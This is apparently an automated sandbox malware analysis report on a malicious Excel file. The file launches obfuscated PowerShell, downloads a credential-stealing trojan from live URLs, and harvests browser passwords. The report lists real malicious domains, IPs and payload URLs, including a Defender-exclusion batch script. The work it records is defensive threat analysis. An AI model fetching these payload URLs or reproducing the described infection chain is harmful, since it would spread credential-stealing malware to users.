      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00440023 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,24_2_00440023
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00434BE4 GetUserNameA,24_2_00434BE4
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043604A __EH_prolog,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,24_2_0043604A
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,24_2_00423778
      Source: C:\Users\user\AppData\Roaming\cr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 BlobJump to behavior

      Stealing of Sensitive Information:

      barindex
      Contains functionality to steal Internet Explorer form passwordsShow sources
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: Software\Microsoft\Internet Explorer\IntelliForms\Storage224_2_0043472B
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: Software\Microsoft\Internet Explorer\IntelliForms\Storage224_2_002A497B
      Tries to harvest and steal browser information (history, passwords, etc)Show sources
      Source: C:\Users\user\AppData\Roaming\cr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Windows\System32\attrib.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Windows\System32\attrib.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Windows\System32\cmd.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Windows\System32\cmd.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting311Application Shimming1Application Shimming1Disable or Modify Tools11OS Credential Dumping2System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection11Deobfuscate/Decode Files or Information11Credentials In Files1Account Discovery1Remote Desktop ProtocolData from Local System11Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Scripting311Security Account ManagerFile and Directory Discovery14SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsCommand and Scripting Interpreter13Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information21NTDSSystem Information Discovery36Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
      Cloud AccountsPowerShell2Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsSecurity Software Discovery221VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncVirtualization/Sandbox Evasion2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection11Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 337274 Sample: ul9kpUwYel.xls Startdate: 08/01/2021 Architecture: WINDOWS Score: 100 68 trashbininspector.fun 2->68 80 Multi AV Scanner detection for domain / URL 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for URL or domain 2->84 86 10 other signatures 2->86 12 EXCEL.EXE 86 29 2->12         started        signatures3 process4 signatures5 102 Obfuscated command line found 12->102 104 Document exploit detected (process start blacklist hit) 12->104 15 cmd.exe 12->15         started        17 cmd.exe 12->17         started        20 cmd.exe 12->20         started        22 2 other processes 12->22 process6 signatures7 24 powershell.exe 7 15->24         started        78 Obfuscated command line found 17->78 26 powershell.exe 16 10 17->26         started        30 powershell.exe 6 20->30         started        33 powershell.exe 7 22->33         started        35 powershell.exe 7 22->35         started        process8 dnsIp9 37 cmd.exe 24->37         started        74 cutt.ly 104.22.1.232, 443, 49165, 49168 CLOUDFLARENETUS United States 26->74 76 37.46.150.139, 49167, 80 IWAYCH Moldova Republic of 26->76 62 C:\Users\user\Documents\pd.bat, ASCII 26->62 dropped 106 Powershell drops PE file 30->106 40 attrib.exe 33->40         started        file10 signatures11 process12 signatures13 88 Obfuscated command line found 37->88 42 cmd.exe 37->42         started        45 cmd.exe 37->45         started        47 mode.com 37->47         started        process14 signatures15 98 Suspicious powershell command line found 42->98 100 Tries to download and execute files (via powershell) 42->100 49 powershell.exe 8 42->49         started        process16 dnsIp17 64 cutt.ly 49->64 66 chebo.discountmonumentcenter.com 192.185.194.191, 49169, 80 UNIFIEDLAYER-AS-1US United States 49->66 58 C:\Users\user\AppData\Roaming\cr.exe, PE32 49->58 dropped 53 cr.exe 5 49->53         started        file18 process19 dnsIp20 70 trashbininspector.fun 104.18.58.219, 443, 49176, 49177 CLOUDFLARENETUS United States 53->70 72 telete.in 195.201.225.248, 443, 49174 HETZNER-ASDE Germany 53->72 60 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 53->60 dropped 90 Multi AV Scanner detection for dropped file 53->90 92 Machine Learning detection for dropped file 53->92 94 Contains functionality to steal Internet Explorer form passwords 53->94 96 Tries to harvest and steal browser information (history, passwords, etc) 53->96 file21 signatures22

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      ul9kpUwYel.xls42%VirustotalBrowse
      ul9kpUwYel.xls25%MetadefenderBrowse
      ul9kpUwYel.xls34%ReversingLabsDocument-Word.Downloader.EncDoc

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\cr.exe100%Joe Sandbox ML
      C:\Users\user\AppData\LocalLow\sqlite3.dll0%MetadefenderBrowse
      C:\Users\user\AppData\LocalLow\sqlite3.dll0%ReversingLabs
      C:\Users\user\AppData\Roaming\cr.exe72%ReversingLabsWin32.Trojan.Glupteba

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      24.2.cr.exe.400000.0.unpack100%AviraHEUR/AGEN.1137972Download File

      Domains

      SourceDetectionScannerLabelLink
      cutt.ly0%VirustotalBrowse
      trashbininspector.fun8%VirustotalBrowse
      chebo.discountmonumentcenter.com4%VirustotalBrowse
      telete.in2%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://37.46.150.139/bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://chebo.discountmonumentcenter.com/vantuz_2021.exe100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      cutt.ly
      		104.22.1.232
      		truetrueunknown
      trashbininspector.fun
      		104.18.58.219
      		truetrueunknown
      chebo.discountmonumentcenter.com
      		192.185.194.191
      		truefalseunknown
      telete.in
      		195.201.225.248
      		truefalseunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://37.46.150.139/bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.batfalse
      • Avira URL Cloud: safe
      		unknown
      http://chebo.discountmonumentcenter.com/vantuz_2021.exetrue
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.piriform.com/ccleanerpowershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmpfalse
        		high
        http://www.%s.comPApowershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2188981999.0000000002500000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		low
        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmpfalse
          		high
          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmpfalse
            		high

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            104.18.58.219
            		unknownUnited States
            		13335CLOUDFLARENETUStrue
            195.201.225.248
            		unknownGermany
            		24940HETZNER-ASDEfalse
            192.185.194.191
            		unknownUnited States
            		46606UNIFIEDLAYER-AS-1USfalse
            37.46.150.139
            		unknownMoldova Republic of
            		8758IWAYCHfalse
            104.22.1.232
            		unknownUnited States
            		13335CLOUDFLARENETUStrue

            General Information

            Joe Sandbox Version:31.0.0 Red Diamond
            Analysis ID:337274
            Start date:08.01.2021
            Start time:09:04:48
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 29s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:ul9kpUwYel.xls
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:26
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.spyw.expl.evad.winXLS@36/22@17/5
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 51%
            • Number of executed functions: 63
            • Number of non-executed functions: 212
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .xls
            • Changed system and user locale, location and keyboard layout to French - France
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 93.184.221.240, 205.185.216.10, 205.185.216.42, 192.35.177.64
            • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, hlb.apr-52dd2-0.edgecastdns.net, apps.digsigtrust.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net, apps.identrust.com
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryDirectoryFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            09:05:58API Interceptor554x Sleep call for process: powershell.exe modified
            09:06:21API Interceptor879x Sleep call for process: cr.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            104.18.58.219fiUdG0AFun.exeGet hashmaliciousBrowse
              7aXAKHF9Fy.exeGet hashmaliciousBrowse
                195.201.225.248http://telete.inGet hashmaliciousBrowse
                • telete.in/
                37.46.150.139spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat
                Payment Documents.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_cf6c45a3-4840-422a-8668-e9a12252c924_thecabal1_wddisabler.bat
                Payment Documents.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_cf6c45a3-4840-422a-8668-e9a12252c924_thecabal1_wddisabler.bat
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_687c7069-ef4b-4efe-b745-594285a9a92b_mic2_wddisabler.bat
                1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_047e37f7-e236-4c64-9509-11f16943b4e0_mic2_wddisabler.bat
                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_3357e6d8-1780-4654-872a-eca3aa375ffd_kingshakes_wdexclusion.bat
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_43922847-73c3-4df3-b101-5f9d12f30aed_mic2_wddisabler.bat
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_43922847-73c3-4df3-b101-5f9d12f30aed_mic2_wddisabler.bat
                AdviceSlip.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_929f596a-b84d-4151-a6b5-c95e07d329c0_frankie777_wddisabler.bat
                Export Order Vene.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_d8648b70-66b3-4072-9876-0224b204a193_spicytorben_wdexclusion.bat

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                cutt.lyspetsifikatsiya.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                Payment Documents.xlsGet hashmaliciousBrowse
                • 104.22.0.232
                Payment Documents.xlsGet hashmaliciousBrowse
                • 104.22.1.232
                Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                • 104.22.1.232
                6Cprm97UTl.xlsGet hashmaliciousBrowse
                • 104.22.0.232
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 104.22.0.232
                1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 104.22.1.232
                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 104.22.0.232
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                AdviceSlip.xlsGet hashmaliciousBrowse
                • 104.22.0.232
                file.xlsGet hashmaliciousBrowse
                • 104.22.1.232
                file.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                file.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                output.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                SecuriteInfo.com.Heur.20246.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                • 104.22.1.232
                SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                • 104.22.0.232
                30689741.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                trashbininspector.funCOO_TPE0269320_image2020-12-31-055841.exeGet hashmaliciousBrowse
                • 172.67.166.210
                sek750_2021.exeGet hashmaliciousBrowse
                • 172.67.166.210
                0I2ddZZKv7.exeGet hashmaliciousBrowse
                • 104.18.59.219
                Q2BZ01fmwK.exeGet hashmaliciousBrowse
                • 104.18.59.219
                fiUdG0AFun.exeGet hashmaliciousBrowse
                • 104.18.58.219
                7aXAKHF9Fy.exeGet hashmaliciousBrowse
                • 104.18.58.219
                sU0m70ahcm.exeGet hashmaliciousBrowse
                • 172.67.166.210
                vDKnVBINrY.exeGet hashmaliciousBrowse
                • 172.67.166.210
                telete.inCOO_TPE0269320_image2020-12-31-055841.exeGet hashmaliciousBrowse
                • 195.201.225.248
                sek750_2021.exeGet hashmaliciousBrowse
                • 195.201.225.248
                0I2ddZZKv7.exeGet hashmaliciousBrowse
                • 195.201.225.248
                Q2BZ01fmwK.exeGet hashmaliciousBrowse
                • 195.201.225.248
                fiUdG0AFun.exeGet hashmaliciousBrowse
                • 195.201.225.248
                7aXAKHF9Fy.exeGet hashmaliciousBrowse
                • 195.201.225.248
                sU0m70ahcm.exeGet hashmaliciousBrowse
                • 195.201.225.248
                vDKnVBINrY.exeGet hashmaliciousBrowse
                • 195.201.225.248
                AhKkG7vMNO.exeGet hashmaliciousBrowse
                • 195.201.225.248
                H8V8ifqdod.exeGet hashmaliciousBrowse
                • 195.201.225.248
                HOJAsmBUjl.exeGet hashmaliciousBrowse
                • 195.201.225.248
                BYatCHksal.exeGet hashmaliciousBrowse
                • 195.201.225.248
                FwkgiBlwcg.exeGet hashmaliciousBrowse
                • 195.201.225.248
                Z4dFPbScY2.exeGet hashmaliciousBrowse
                • 195.201.225.248
                0XxTmF8pEW.exeGet hashmaliciousBrowse
                • 195.201.225.248
                uMtPsgsHU2.exeGet hashmaliciousBrowse
                • 195.201.225.248
                ZJaczSqbMl.exeGet hashmaliciousBrowse
                • 195.201.225.248
                53CmqAXIHb.exeGet hashmaliciousBrowse
                • 195.201.225.248
                VWOhpUmgcP.exeGet hashmaliciousBrowse
                • 195.201.225.248
                S5N3DvtQ0h.exeGet hashmaliciousBrowse
                • 195.201.225.248

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                IWAYCHspetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                Payment Documents.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                Payment Documents.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                AdviceSlip.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                Export Order Vene.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                SimpNet.shGet hashmaliciousBrowse
                • 37.46.150.238
                Rr0veY2Ho5.exeGet hashmaliciousBrowse
                • 37.46.150.211
                product_qoute_6847684898.xlsGet hashmaliciousBrowse
                • 37.46.150.211
                EjtRDKZNkXWoLTE.exeGet hashmaliciousBrowse
                • 37.46.150.60
                ru7co.xlsGet hashmaliciousBrowse
                • 37.46.150.60
                http://37.46.150.184/high/imanGet hashmaliciousBrowse
                • 37.46.150.184
                SWIFT-MTC749892-10-12-20_pdf.exeGet hashmaliciousBrowse
                • 37.46.150.41
                SWIFT COPY.xlsGet hashmaliciousBrowse
                • 37.46.150.41
                PAYMENT DOC.xlsGet hashmaliciousBrowse
                • 37.46.150.41
                CLOUDFLARENETUSF6D24k8j9o.exeGet hashmaliciousBrowse
                • 104.28.5.151
                36.exeGet hashmaliciousBrowse
                • 104.28.8.109
                IKWSLxGlrQ.exeGet hashmaliciousBrowse
                • 172.67.188.154
                https://bit.ly/35cYpiTGet hashmaliciousBrowse
                • 104.16.18.94
                https://new-fax-messages.mydopweb.com/Get hashmaliciousBrowse
                • 104.16.18.94
                https://www.food4rhino.com/app/humanGet hashmaliciousBrowse
                • 104.16.18.94
                OKU-010920 SCQ-220920.docGet hashmaliciousBrowse
                • 104.24.113.40
                https://www.food4rhino.com/app/elefrontGet hashmaliciousBrowse
                • 104.16.18.94
                INFO.docGet hashmaliciousBrowse
                • 104.18.61.59
                Softerra Adaxes 2011.3.exeGet hashmaliciousBrowse
                • 172.67.215.32
                https://atacadaodocompensado.com.br/office356.com-RD163Get hashmaliciousBrowse
                • 104.16.124.96
                http://message.mydopweb.comGet hashmaliciousBrowse
                • 104.16.18.94
                https://hcsonsite-my.sharepoint.com/:b:/p/kmunneke/Ed-MOs2kV-NKo-A6zYXkP-8BJ5RTme_cDf9g6Ut5u5rIiA?e=MaLsZF hcsonsite-my.sharepoint.comGet hashmaliciousBrowse
                • 104.16.95.65
                http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.comGet hashmaliciousBrowse
                • 104.16.18.94
                http://subreqxserver1132.azurewebsites.netGet hashmaliciousBrowse
                • 104.16.18.94
                document.chm .exeGet hashmaliciousBrowse
                • 104.27.202.87
                catalogo TAWI group.exeGet hashmaliciousBrowse
                • 104.27.188.95
                MAIL-0573188.docGet hashmaliciousBrowse
                • 172.67.158.72
                DSj7ak0N6I.exeGet hashmaliciousBrowse
                • 104.28.5.151
                https://wqi69130.mfs.gg/099mmYlGet hashmaliciousBrowse
                • 172.67.74.85
                HETZNER-ASDEBuran.exeGet hashmaliciousBrowse
                • 88.99.66.31
                SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                • 188.40.194.163
                https://web.tresorit.com/l/JG7xl#7YqXRnhV6spRT3ekJskNawGet hashmaliciousBrowse
                • 138.201.9.137
                order FTH2004-005 .exeGet hashmaliciousBrowse
                • 144.76.181.177
                SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                • 188.40.194.163
                http://search.hwatchtvnow.coGet hashmaliciousBrowse
                • 116.202.46.88
                LzSA04PNya.exeGet hashmaliciousBrowse
                • 88.99.66.31
                xPcTV1mh3w.exeGet hashmaliciousBrowse
                • 88.99.66.31
                http://ovd.ru/forum/register.php?a=act&u=84666&i=25545989Get hashmaliciousBrowse
                • 159.69.74.8
                https://kingfenceny.1kcloud.com/edlv_3zGFs/#0Get hashmaliciousBrowse
                • 188.40.18.222
